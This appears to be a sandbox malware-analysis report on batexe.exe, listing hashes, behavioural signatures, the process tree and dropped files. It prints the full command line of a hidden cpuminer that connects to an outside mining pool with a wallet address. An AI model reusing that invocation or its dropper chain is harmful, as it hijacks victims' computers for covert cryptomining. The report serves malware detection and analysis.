Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
293s -
max time network
304s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-ja -
resource tags
arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
24/02/2024, 05:36
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 1712 b2e.exe 4572 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4572 cpuminer-sse2.exe 4572 cpuminer-sse2.exe 4572 cpuminer-sse2.exe 4572 cpuminer-sse2.exe 4572 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/2160-8-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2160 wrote to memory of 1712 2160 batexe.exe 91 PID 2160 wrote to memory of 1712 2160 batexe.exe 91 PID 2160 wrote to memory of 1712 2160 batexe.exe 91 PID 1712 wrote to memory of 3816 1712 b2e.exe 92 PID 1712 wrote to memory of 3816 1712 b2e.exe 92 PID 1712 wrote to memory of 3816 1712 b2e.exe 92 PID 3816 wrote to memory of 4572 3816 cmd.exe 95 PID 3816 wrote to memory of 4572 3816 cmd.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Users\Admin\AppData\Local\Temp\662C.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\662C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\662C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6959.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4572
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD5dd120be9024c8db98339b2d7d0cf98a7
SHA1a6639a0758768cf3ece2582526fc14f7ca3f3293
SHA256c149ec57eb5c607f160df585fda9e525d186f011eb40405d98fe5c6c7432880a
SHA512210a8a010a6bf033f2b0554520b638f66b6d56e3061dadd71cb708872de9a2d57528392ee9c52838e4aab1ff139c5463c14b36300bccd3be83db7013f18fc9d9
-
Filesize
195KB
MD551fa474a860faa1fb1d707c30c9c450d
SHA1c0bf3e365884dd363792c4e95827ffc49692f223
SHA2568471cc2995134f2026dfd4f279ef13e453bb5901240ce7ca28fd551855f2e6fc
SHA51281f4b563522dafe8171929f3d637a7c640c504bedfa41686bfdbd888a077585edb93afd42962872358e3771362ddf603074869230e864f2b050a5b7222e982bb
-
Filesize
160KB
MD5bc208b87a9ee269e2d82e2a4fe224ae0
SHA18313d1e06ae6ce71a4ff06ba702cc3adc73db9ca
SHA256c5e9cd96e24f5ee777d2425d6676069e3c3955e9afc6f4be46831f2cfd37cc8e
SHA51204763319cfa045cd5a6b180f68d743ffd534b06618b79dec85f7462ec4caf67926140e2b788bb4eb7d46ebce202f518fac45e930a819f7be13c2eb996df08705
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
827KB
MD5115f4233697af0f475351a633bd88c39
SHA1d60d560e307b798e942c142597360fa762084dc5
SHA2562e9b4cfecacf2aa451e283722c34003e9036dddd8c7dad8fcc601ab2b0f438c8
SHA512e18e3b7b1fcbe75b43060b10d690934771e5ff9325a1fc7151c6bd07e721614e8d0be903073504e76610f01f85cf3ad77623c3f7c62f4b6a28829fa0477f94ed
-
Filesize
539KB
MD50143ce48f566e290b642270decb05248
SHA14bdbda5180c4c11e03b79fe91ccaab68d939d847
SHA2561804f4c29e22b95acbee0da2fa492924fda99f3f79edd530d777b3b9410e03cf
SHA5121d468b6817356ad2f128e767b67b39d27a49f31d922f0ba5ada6836f6eaacc2fc87b1bc4137263bf9b56fa2d72913f3ff2e953520a48e36b24af638fa966ed9d
-
Filesize
567KB
MD5cf7dcfcc61e42ea0bdf9b6b2bf8412b9
SHA1449eee947536e5e2b90c6a28b0ba39e20759eb12
SHA256cd127c17f1c7c196b8a3869ad2c9763a1e139855979e74b67e61512585b67090
SHA5126d084d660fffc0c3443b3ada069289fd532534709216e4171b02f43756e6338faa65a2ffc9ae6de6b0a011e790ae3d0a4bddc30ab6e0b032e6fd2f5a455e9a48
-
Filesize
661KB
MD56dcd4bdf461014d434b6d0605bcd000a
SHA136223cfb32be591c9ee973cbd582bb4298d11f5f
SHA256cb0ea90f33a2b6166b4770065b0c2939044d98931678cbe02dbcf49fb2e65113
SHA5120017771d0dbbed710692f3135c5da03b4ca464a48ebea999e463711ba73861d54a9bd050167a213b389c3a60111353e39956ef96a999527eda403440e6daa43e
-
Filesize
675KB
MD58ca9467bfdec50ced9fc12ddf6b3ca23
SHA1f2830b736329d8b65f6df2e632e5d723b07f6ddb
SHA2563f02f761164ca51821957466ec8e5c6d18b9f6b82aebb2ed33c3ff02ecd28c99
SHA512e6507d8fd332277bc8c9219a8e3ff925a299da89620c4b3e1527998256e4573d71fabce82db8ec5dfc2784b2480c73d197ed58fd9a41df8ac6f60d00bc7f8625
-
Filesize
564KB
MD5c001fa39065aa957b91ce42f78a0e809
SHA1c83636f153ad1ff3c1cf992f56fdd0d2d978b18a
SHA256e164a793c29f970fdaba7c3004be7183953c0bb5aabfebe2d5a361d543cb3abe
SHA512e6129306be1e9d4456a1179a292a5c86239f3e6ea453b6149019bee06da79b1252f1fb64ab4b443d3f49a25df53ed49bca07cf07ad241f6c14ca28619c81fdac
-
Filesize
552KB
MD55cb1f5d193f294970e8d580814a7c4b3
SHA134cb6e91a892e45045ba66b1005c7cc42d69fa44
SHA256454d5b9b7bc7b9f33b115a2f8030fa6676e9d68f78f8991fd5c9fad9e76ef536
SHA512e7e2073522fb5cb83ae244aae07288e910720e30199a388ef596b03d3c53ce5855b51425fe714c74f35299b8c714b3f159e59887f74799a9908a708aa5940b08
-
Filesize
620KB
MD56307a2bf5c4a1f22fd1be8a5fa9db7d4
SHA17db4021ea193b1038c936da66d270a3f6e526749
SHA256c08fa68624051cc3e9deecef5b6fd0e0d1ddf9fa278f84ce3a6002145c5c83dc
SHA5123741058b7b4abde485096f271e87718fcb5cc780b81990076e6e6dd67461042032d387670632e61b493fbdb4d03f65df627ffb9966c3d38f3420a1e7240b24e7
-
Filesize
655KB
MD55c3004e8ef491f1f13b972af63fd7bcd
SHA1c7ae4e8c3614250a2b520bf49ff38b8d8af1fc87
SHA25692cad41cb51254b1a409c6fbd4d5134c884f9189b87660a3504af5b4de42da61
SHA512dc4eba1a7f11738c91aba1c50cb593306b623f73fba6ccd58327751160ca11d761fa1ae642e862ed3fc158fb8685b7d0a0b34fa1567c5ea2325d3c0005e1927b
-
Filesize
396KB
MD541df0eb6945938ed57a27266d0f005ae
SHA1e1da06028389f7a6d7cc6bbae0c6cf5627435d15
SHA256b8c7867893f00db0c1ed3ea8c20df9bd86d1105222e0b8d46376fd63f29f4a44
SHA512c84375a4ae73922887c81d76a217ee94edac1de0e7992d06bb357cad1006b0d731923158880b12143f88163d0a5604f46bcd1b5f4abb2f333b0fba7c1b823f56
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770